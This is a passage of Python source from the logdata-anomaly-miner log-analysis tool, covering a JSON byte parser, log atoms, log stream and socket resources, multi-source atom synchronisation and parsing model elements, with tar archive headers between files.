0xe0 <= byte_data < 0xf0: # 3-byte UTF-8 Character left = 2 num = (byte_data & 0xf) << 12 return _utf8 if 0xf0 <= byte_data < 0xf8: # 4-byte UTF-8 Character left = 3 num = (byte_data & 0x07) << 18 return _utf8 return None # Nestable state machine for hex escaped characters def hex_machine(emit): left = 4 num = 0 def _hex(byte_data): nonlocal num, left if 0x30 <= byte_data < 0x3a: i = byte_data - 0x30 elif 0x61 <= byte_data <= 0x66: i = byte_data - 0x57 elif 0x41 <= byte_data <= 0x46: i = byte_data - 0x37 else: return None left -= 1 num |= i << (left * 4) if left: return _hex return emit(num) return _hex def number_machine(byte_data, emit): sign = 1 number = 0 decimal = 0 esign = 1 exponent = 0 dividend = 10 start_with_zero = False def _mid(byte_data): if start_with_zero and byte_data not in (0x2e, 0x45, 0x65, 0x7d, 0x2c, 0xa, 0x20): # . E e } , \n Space return None if byte_data == 0x2e: # . return _decimal return _later(byte_data) def _number(byte_data): nonlocal number if 0x30 <= byte_data < 0x3a: number = number * 10 + (byte_data - 0x30) return _number return _mid(byte_data) def _start(byte_data): nonlocal start_with_zero if byte_data == 0x30: start_with_zero = True return _mid if 0x30 < byte_data < 0x3a: return _number(byte_data) return None def _decimal(byte_data): nonlocal decimal nonlocal dividend if 0x30 <= byte_data < 0x3a: decimal += (byte_data - 0x30) / dividend dividend *= 10 return _decimal return _later(byte_data) def _later(byte_data): if byte_data in (0x45, 0x65): # E e return _esign return _done(byte_data) def _esign(byte_data): nonlocal esign if byte_data == 0x2b: # + return _exponent if byte_data == 0x2d: # - esign = -1 return _exponent return _exponent(byte_data) def _exponent(byte_data): nonlocal exponent if 0x30 <= byte_data < 0x3a: exponent = exponent * 10 + (byte_data - 0x30) return _exponent return _done(byte_data) def _done(byte_data): value = sign * (number + decimal) if exponent: value *= math.pow(10, esign * exponent) return emit(value, byte_data) if byte_data == 0x2d: # - sign = -1 return _start if byte_data == 0x2b: # + return _start return _start(byte_data) def array_machine(emit): array_data = [] def _array(byte_data): if byte_data == 0x5d: # ] return emit(array_data) return json_machine(on_value, _comma)(byte_data) def on_value(value): array_data.append(value) def _comma(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return json_machine(on_value, _comma) if byte_data == 0x5d: # ] return emit(array_data) return None return _array def object_machine(emit): object_data = {} key = None def _object(byte_data): if byte_data == 0x7d: # return emit(object_data) return _key(byte_data) def _key(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _object # Ignore whitespace if byte_data == 0x22: return string_machine(on_key) return None def on_key(result): nonlocal key key = result return _colon def _colon(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _colon # Ignore whitespace if byte_data == 0x3a: # : return json_machine(on_value, _comma) return None def on_value(value): object_data[key] = value def _comma(byte_data): if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return _key if byte_data == 0x7d: # return emit(object_data) return None return _object logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogAtom.py000066400000000000000000000056071500476301700322660ustar00rootroot00000000000000"""This module defines a log atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ParserMatch import ParserMatch class LogAtom: """This class defines a log atom used for parsing.""" idCounter = -1 def __init__(self, raw_data, parser_match, atom_time, source): """Create a log atom from scratch.""" if not isinstance(raw_data, bytes): msg = "raw_data must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(raw_data) == 0: msg = "raw_data must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.raw_data = raw_data if parser_match is not None and not isinstance(parser_match, ParserMatch): msg = "parser_match must be of type ParserMatch." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parser_match = parser_match if atom_time is not None and (not isinstance(atom_time, (int, float)) or isinstance(atom_time, bool)): msg = "atom_time must be of type integer or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_time = atom_time self.source = source LogAtom.idCounter += 1 self.log_line_identifier = LogAtom.idCounter def get_parser_match(self): """Get the parser match associated with this LogAtom. @return the match or None for (yet) unparsed LogAtoms. """ return self.parser_match def set_timestamp(self, timestamp): """Update the default timestamp value associated with this LogAtom. The method can be called more than once to allow correction of fine-adjusting of timestamps by analysis filters after initial parsing procedure. """ self.atom_time = timestamp def get_timestamp(self): """Get the default timestamp value for this LogAtom. @return the timestamp as number of seconds since 1970. """ return self.atom_time def is_parsed(self): """Check if this atom is parsed by checking if parserMatch object is attached.""" return self.parser_match is not None logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogStream.py000066400000000000000000000513221500476301700326140ustar00rootroot00000000000000"""This module contains interfaces and classes for logdata resource handling and combining them to resumable virtual LogStream objects. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import errno import hashlib import os import socket import stat import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util.StringUtil import encode_byte_string_as_string from aminer.input.InputInterfaces import LogDataResource from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer class FileLogDataResource(LogDataResource): """This class defines a single log data resource using an underlying file accessible via the file descriptor. The characteristics of this type of resource is, that reopening and repositioning of the stream has to be possible. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new file type resource. @param log_resource_name the unique name of this source as bytes array, has to start with "file://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attempt to position the stream using the given data. """ if not isinstance(log_resource_name, bytes): msg = "log_resource_name must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(log_stream_fd, bool) or not isinstance(log_stream_fd, int): msg = "log_stream_fd must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not log_resource_name.startswith(b"file://") or log_resource_name == b"file://": msg = "Attempting to create different type resource as file" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_resource_name = log_resource_name self.log_file_fd = log_stream_fd self.stat_data = None if self.log_file_fd >= 0: self.stat_data = os.fstat(log_stream_fd) self.buffer = b"" if isinstance(default_buffer_size, bool) or not isinstance(default_buffer_size, int): msg = "default_buffer_size must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_buffer_size <= 0: msg = "default_buffer_size must not be smaller or equal to zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 # Create a hash for repositioning. There is no need to be cryptographically secure here: if upstream can manipulate the content, # to provoke hash collisions, correct positioning would not matter anyway. self.repositioning_digest = hashlib.md5() # nosec B328 if repositioning_data is not None and (not isinstance(repositioning_data, list) or len(repositioning_data) != 3 or isinstance( repositioning_data[0], bool) or not isinstance(repositioning_data[0], int) or isinstance(repositioning_data[1], bool) or not isinstance(repositioning_data[1], int) or not isinstance(repositioning_data[2], bytes)): msg = "repositioning_data must be a list with three elements with the data types [int, int, bytes]." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (log_stream_fd != -1) and (repositioning_data is not None): if repositioning_data[0] != self.stat_data.st_ino: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, inode number mismatch" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) elif repositioning_data[1] > self.stat_data.st_size: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file size too small" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) else: hash_algo = hashlib.md5() # nosec B328 length = repositioning_data[1] while length != 0: block = None if length < default_buffer_size: block = os.read(self.log_file_fd, length) else: block = os.read(self.log_file_fd, default_buffer_size) if not block: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file shrunk while" \ f" reading" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) break hash_algo.update(block) length -= len(block) digest = hash_algo.digest() if length == 0: if digest == base64.b64decode(repositioning_data[2]): # Repositioning is OK, keep current digest and length data. self.total_consumed_length = repositioning_data[1] self.repositioning_digest = hash_algo else: msg = f"Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, digest changed" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) length = -1 if length != 0: # Repositioning failed, go back to the beginning of the stream. os.lseek(self.log_file_fd, 0, os.SEEK_SET) def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopen_flag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if not reopen_flag and (self.log_file_fd != -1): msg = "Cannot reopen stream still open when not instructed to do so" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_file_fd = -1 stat_data = None try: log_file_fd = SecureOSFunctions.secure_open_file(self.log_resource_name[7:], os.O_RDONLY) stat_data = os.fstat(log_file_fd) except OSError as openOsError: msg = f"OSError occurred in FileLogDataResource.open(). Error message: {openOsError}" logging.getLogger(DEBUG_LOG_NAME).error(msg) if log_file_fd != -1: os.close(log_file_fd) if openOsError.errno == errno.ENOENT: return False raise if not stat.S_ISREG(stat_data.st_mode) and not stat.S_ISFIFO(stat_data.st_mode): os.close(log_file_fd) msg = f"Attempting to open non-regular file {encode_byte_string_as_string(self.log_resource_name)} as file" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if reopen_flag and (self.stat_data is not None) and (stat_data.st_ino == self.stat_data.st_ino) and ( stat_data.st_dev == self.stat_data.st_dev): # Reopening was requested, but we would reopen the file already opened, which is of no use. os.close(log_file_fd) return False # This is a new file or a successful reopen attempt. self.log_file_fd = log_file_fd self.stat_data = stat_data return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_file_fd def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ data = os.read(self.log_file_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.repositioning_digest.update(self.buffer[:length]) self.total_consumed_length += length self.buffer = self.buffer[length:] def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ return [self.stat_data.st_ino, self.total_consumed_length, base64.b64encode(self.repositioning_digest.digest())] def close(self): """Close the log file.""" os.close(self.log_file_fd) self.log_file_fd = -1 class UnixSocketLogDataResource(LogDataResource): """This class defines a single log data resource connecting to a local UNIX socket. The characteristics of this type of resource is, that reopening works only after end of stream of was reached. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """Create a new unix socket type resource. @param log_resource_name the unique name of this source as byte array, has to start with "unix://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data has to be None for this type of resource. """ if not isinstance(log_resource_name, bytes): msg = "log_resource_name must be of type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(log_stream_fd, bool) or not isinstance(log_stream_fd, int): msg = "log_stream_fd must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not log_resource_name.startswith(b"unix://") or log_resource_name == b"unix://": msg = "Attempting to create different type resource as unix" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_resource_name = log_resource_name self.log_stream_fd = log_stream_fd self.buffer = b"" if isinstance(default_buffer_size, bool) or not isinstance(default_buffer_size, int): msg = "default_buffer_size must be of type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_buffer_size <= 0: msg = "default_buffer_size must not be smaller or equal to zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 def open(self, reopen_flag=False): """Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if reopen_flag: if self.log_stream_fd != -1: return False elif self.log_stream_fd != -1: msg = "Cannot reopen stream still open when not instructed to do so" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_socket = None try: log_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) log_socket.connect(self.log_resource_name[7:]) except socket.error as socketError: logging.getLogger(DEBUG_LOG_NAME).error( "OSError occurred in UnixSocketLogDataResource.open(). Error message: %s", socketError.msg) if log_socket is not None: log_socket.close() if socketError.errno in (errno.ENOENT, errno.ECONNREFUSED): return False # Transform exception to OSError as caller does not expect something else. raise OSError(socketError[0], socketError[1]) self.log_stream_fd = os.dup(log_socket.fileno()) log_socket.close() return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_stream_fd def fill_buffer(self): """Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ data = os.read(self.log_stream_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.total_consumed_length += length self.buffer = self.buffer[length:] def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable. """ return None def close(self): """Close the log stream.""" os.close(self.log_stream_fd) self.log_stream_fd = -1 class LogStream: """This class defines a continuous stream of logging data from a given source. This class also handles rollover from one file descriptor to a new one. """ def __init__(self, log_data_resource, stream_atomizer): """Create a new log stream with an initial logDataResource. @param stream_atomizer the atomizer to forward data to. """ # The resource currently processed. Might also be None when previous # resource was read till end and no rollover to new one had occurred. if not isinstance(log_data_resource, LogDataResource): msg = "log_data_resource must be of type LogDataResource." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.log_data_resource = log_data_resource if not isinstance(stream_atomizer, ByteStreamLineAtomizer): msg = "log_data_resource must be of type LogDataResource." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.stream_atomizer = stream_atomizer # Last reading state, those are the same as returned by StreamAtomizer # consumeData() method. Start with state 0 (more data required). self.last_consume_state = 0 self.next_resources = [] def add_next_resource(self, next_log_data_resource): """Roll over from one fd to another one pointing to the newer version of the same file. This will also change reading behaviour of current resource to await EOF or stop as soon as first blocking read does not return any data. """ # Just append the resource to the list of next resources. The next read operation without any input from the primary resource # will pick it up automatically. if self.log_data_resource is None: self.log_data_resource = next_log_data_resource else: self.next_resources.append(next_log_data_resource) def handle_stream(self): """Handle data from this stream by forwarding it to the atomizer. @return the file descriptor to monitoring for new input or -1 if there is no new data or atomizer was not yet ready to consume data. Handling should be tried again later on. """ if self.log_data_resource is None: return -1 if self.last_consume_state == 0: # We need more data, read it. read_length = self.log_data_resource.fill_buffer() if read_length == -1: self.last_consume_state = self.roll_over() return self.last_consume_state if read_length == 0: if not self.next_resources: # There is just no input, but we still need more since last round as indicated by lastConsumeState. We would not have # been called if this is a blocking stream, so this must be the preliminary end of the file. Tell caller to wait and # retry read later on. Keep lastConsumeState value, consume still wants more data. return -1 # This seems to EOF for rollover. self.last_consume_state = self.roll_over() return self.last_consume_state # So there was something read, process it the same way as if data was already available in previous round. self.last_consume_state = self.stream_atomizer.consume_data(self.log_data_resource.buffer, False) if self.last_consume_state < 0: return -1 if self.last_consume_state != 0: self.log_data_resource.update_position(self.last_consume_state) return self.log_data_resource.get_file_descriptor() def roll_over(self): """End reading of the current resource and switch to the next. This method does not handle last_consume_state, that has to be done outside. @return state in same manner as handle_stream() """ consumed_length = self.stream_atomizer.consume_data(self.log_data_resource.buffer, True) if consumed_length < 0: # Consumer is not ready to consume yet. Retry later on. return -1 if consumed_length != len(self.log_data_resource.buffer): if consumed_length != 0: # Some data consumed, unclear why not all when already at end of stream. Retry again immediately to find out why. self.log_data_resource.update_position(consumed_length) return self.log_data_resource.get_file_descriptor() # This is a clear protocol violation (see StreamAtomizer documentation): When at EOF, 0 is no valid return value. msg = f"Protocol violation by {self.stream_atomizer.__class__.__name__} detected, flushing data" logging.getLogger(DEBUG_LOG_NAME).critical(msg) print("FATAL: " + msg, file=sys.stderr) consumed_length = len(self.log_data_resource.buffer) # Everything consumed, so now ready for rollover. self.log_data_resource.update_position(consumed_length) self.log_data_resource.close() if not self.next_resources: self.log_data_resource = None return -1 self.log_data_resource = self.next_resources[0] del self.next_resources[0] return self.log_data_resource.get_file_descriptor() def get_current_fd(self): """Get the file descriptor for reading the currently active log_data resource.""" if self.log_data_resource is None: return -1 return self.log_data_resource.get_file_descriptor() def get_repositioning_data(self): """Get the repositioning information from the currently active underlying log_data resource.""" if self.log_data_resource is None: return None return self.log_data_resource.get_repositioning_data() def close(self): """Close the log stream.""" if self.log_data_resource is not None: self.log_data_resource.close() SimpleByteStreamLineAtomizerFactory.py000066400000000000000000000146271500476301700377530ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This module defines a factory for instanciating line atomizers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.InputInterfaces import AtomizerFactory, AtomHandlerInterface from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.events.EventInterfaces import EventHandlerInterface class SimpleByteStreamLineAtomizerFactory(AtomizerFactory): """This factory just creates the same atomizer for each new resource. All parsed and unparsed atoms are delivered via two lists of handlers. """ def __init__(self, parsing_model, atom_handler_list, event_handler_list, default_timestamp_path_list=None, eol_sep=b'\n', json_format=False, xml_format=False, parser_model_dict=None, log_resources=None, use_real_time=False, continuous_timestamp_missing_warning=True): """Create the factory to forward data and events to the given lists for each newly created atomizer. @param default_timestamp_path_list if not empty list, the value of this timestamp field is extracted from parsed atoms and stored as default timestamp for that atom. """ if not isinstance(parsing_model, ModelElementInterface): msg = "parsing_model must be of type ModelElementInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parsing_model = parsing_model if atom_handler_list is not None and (not isinstance(atom_handler_list, list) or not all( isinstance(x, AtomHandlerInterface) for x in atom_handler_list)): msg = "atom_handler_list must be None or a list of AtomHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_handler_list = atom_handler_list if not isinstance(event_handler_list, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handler_list): msg = "event_handler_list must be a list of EventHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.event_handler_list = event_handler_list if default_timestamp_path_list is None: default_timestamp_path_list = [] if not isinstance(default_timestamp_path_list, list) or not all(isinstance(x, str) for x in default_timestamp_path_list): msg = "default_timestamp_path_list must be a list of strings!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.default_timestamp_path_list = default_timestamp_path_list if not isinstance(eol_sep, bytes): msg = "eol_sep parameter must be of type bytes!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(eol_sep) == 0: msg = "eol_sep parameter must not be empty!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.eol_sep = eol_sep if not isinstance(json_format, bool): msg = "json_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.json_format = json_format if not isinstance(xml_format, bool): msg = "xml_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.xml_format = xml_format if json_format is True and xml_format is True: msg = "json_format and xml_format can not be true at the same time." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(use_real_time, bool): msg = "use_real_time parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.use_real_time = use_real_time self.printed_warning = False if not isinstance(continuous_timestamp_missing_warning, bool): msg = "continuous_timestamp_missing_warning parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.continuous_timestamp_missing_warning = continuous_timestamp_missing_warning self.parser_model_dict = parser_model_dict self.log_resources = log_resources def get_atomizer_for_resource(self, resource_name): """Get an atomizer for a given resource. @param resource_name the resource name for atomizer selection is ignored in this type of factory. @return a StreamAtomizer object """ if self.log_resources is not None and resource_name in self.log_resources.keys(): resource = self.log_resources[resource_name] json = resource["json"] xml = resource["xml"] if json is None: json = self.json_format if xml is None: xml = self.xml_format parser = self.parsing_model if resource["parser_id"] is not None: parser = self.parser_model_dict[resource["parser_id"]] return ByteStreamLineAtomizer( parser, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, json, xml, self.use_real_time, resource_name, self.continuous_timestamp_missing_warning) return ByteStreamLineAtomizer( self.parsing_model, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, self.json_format, self.xml_format, self.use_real_time, resource_name, self.continuous_timestamp_missing_warning) SimpleMultisourceAtomSync.py000066400000000000000000000146461500476301700360130ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This module defines a handler that synchronizes different streams. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.AminerConfig import DEBUG_LOG_NAME class SimpleMultisourceAtomSync(AtomHandlerInterface): """This class synchronizes different atom streams by forwarding the atoms only from the source delivering the oldest ones. This is done using the atom timestamp value. Atoms without a timestamp are forwarded immediately. When no atoms are received from a source for some time, no more atoms are expected from that source. This will allow forwarding of blocked atoms from other sources afterwards. """ def __init__(self, atom_handler_list, sync_wait_time=5): """ @param atom_handler_list forward atoms to all handlers in the list, no matter if the log_atom was handled or not. @return true as soon as forwarding was attempted, no matter if one downstream handler really consumed the atom. """ if not atom_handler_list or not isinstance(atom_handler_list, list) or not all( isinstance(x, AtomHandlerInterface) for x in atom_handler_list): msg = "atom_handler_list must be a list of AtomHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_handler_list = atom_handler_list if isinstance(sync_wait_time, bool) or not isinstance(sync_wait_time, (int, float)): msg = "sync_wait_time must be a float or integer!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.sync_wait_time = sync_wait_time # Last forwarded log atom timestamp self.last_forward_timestamp = 0 # The dictionary containing the currently active sources. Each entry is a list with two values: # * the largest timestamp of a LogAtom forwarded from this source so far. # * the current LogAtom pending to be forwarded or None if all atoms were forwarded self.sources_dict = {} # The local clock time when blocking was enabled for any source. Start in blocking mode to have chance to see atom from each # available source before forwarding the first ones. self.blocking_end_time = time.time() + self.sync_wait_time self.blocking_sources = 0 self.timestamps_unsorted_flag = False self.last_forwarded_source = None self.buffer_empty_counter = 0 def receive_atom(self, log_atom): """Receive a log atom from a source.""" if self.last_forwarded_source is not None and log_atom.source != self.last_forwarded_source and self.buffer_empty_counter < ( 2 * len(self.sources_dict.keys())): self.buffer_empty_counter += 1 return False self.buffer_empty_counter = 0 self.last_forwarded_source = None timestamp = log_atom.atom_time if timestamp is None: self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source return True source_info = self.sources_dict.get(log_atom.source) if source_info is None: source_info = [timestamp, log_atom] self.sources_dict[log_atom.source] = source_info else: if timestamp < source_info[0]: # Atoms not sorted, not our problem. Forward it immediately. self.timestamps_unsorted_flag = True self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source return True if source_info[1] is None: source_info[1] = log_atom # Source information with the oldest pending atom. oldest_source_info = None has_idle_sources_flag = False for source_info in self.sources_dict.values(): if source_info[1] is None: has_idle_sources_flag = True continue if oldest_source_info is None: oldest_source_info = source_info continue if source_info[1].atom_time < oldest_source_info[1].atom_time: oldest_source_info = source_info if self.blocking_end_time != 0: # We cannot do anything while blocking to catch more atoms. if self.blocking_end_time > time.time(): return False # Blocking has expired, cleanup the blockers. expired_sources = [] for source, source_info in self.sources_dict.items(): if source_info[1] is None: expired_sources.append(source) for source in expired_sources: del self.sources_dict[source] self.blocking_end_time = 0 self.blocking_sources = 0 has_idle_sources_flag = False if has_idle_sources_flag: # We cannot let this item pass. Before entering blocking state, give all other sources also the chance to submit an atom. if self.blocking_sources == len(self.sources_dict): self.blocking_end_time = time.time() + self.sync_wait_time else: self.blocking_sources += 1 return False # No idle sources, just forward atom from the oldest one if that is really the currently active source. if log_atom != oldest_source_info[1]: return False self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source oldest_source_info[1] = None if timestamp > oldest_source_info[0]: oldest_source_info[0] = timestamp self.blocking_sources = 0 return True def forward_atom(self, log_atom): """Forward atom to all atom handlers.""" for handler in self.atom_handler_list: handler.receive_atom(log_atom) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/000077500000000000000000000000001500476301700306465ustar00rootroot00000000000000AnyByteDataModelElement.py000066400000000000000000000027111500476301700356020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element that matches any byte. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class AnyByteDataModelElement(ModelElementInterface): """This class matches any byte but at least one. Thus, a match will always span the complete data from beginning to end. """ def get_match_element(self, path: str, match_context): """Just return a match including all data from the context. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. """ match_data = match_context.match_data if not match_data: return None match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) Base64StringModelElement.py000066400000000000000000000044701500476301700356540ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module provides base64 string matching. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import re from aminer import AminerConfig from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class Base64StringModelElement(ModelElementInterface): """This class just tries to strip off as many base64 bytes as possible from a given data string.""" def __init__(self, element_id: str): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. """ super().__init__(element_id) self.regex = re.compile(b"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?") def get_match_element(self, path: str, match_context): """Find the maximum number of bytes forming an integer number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found. """ match = self.regex.match(match_context.match_data) if match is None or match.span()[1] == 0: return None match_len = match.span()[1] match_string = match_context.match_data[:match_len] match_context.update(match_string) try: match_value = base64.b64decode(match_string) # we need to check if no exception is raised when decoding the original string. match_value.decode(AminerConfig.ENCODING) except UnicodeDecodeError: match_value = match_string return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DateTimeModelElement.py000066400000000000000000001012761500476301700351370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module contains a datetime parser and helper classes for parsing. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the 